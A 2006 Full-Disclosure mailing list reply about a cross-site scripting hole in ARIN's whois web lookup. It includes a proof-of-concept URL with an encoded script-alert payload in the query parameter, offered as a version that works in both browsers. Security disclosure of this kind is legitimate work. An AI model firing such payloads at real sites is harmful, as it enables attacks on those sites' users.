[Full-disclosure] Arin.net XSS

php0t very at unprivate.com
Fri Mar 3 21:29:10 GMT 2006


  Yes, because firefox probably doesn't execute javascript if the
location is in an IMG tag.
I don't know why they posted that in the first place.

Here's a link that will probably work under both browsers

http://ws.arin.net/whois/?queryinput=%3Cscript%3Ealert('666')%3C/script%
3E

> Right,
>    Did this ever work? This fails for me man. How did you verify it?





Full-Disclosure is hosted and sponsored by Secunia.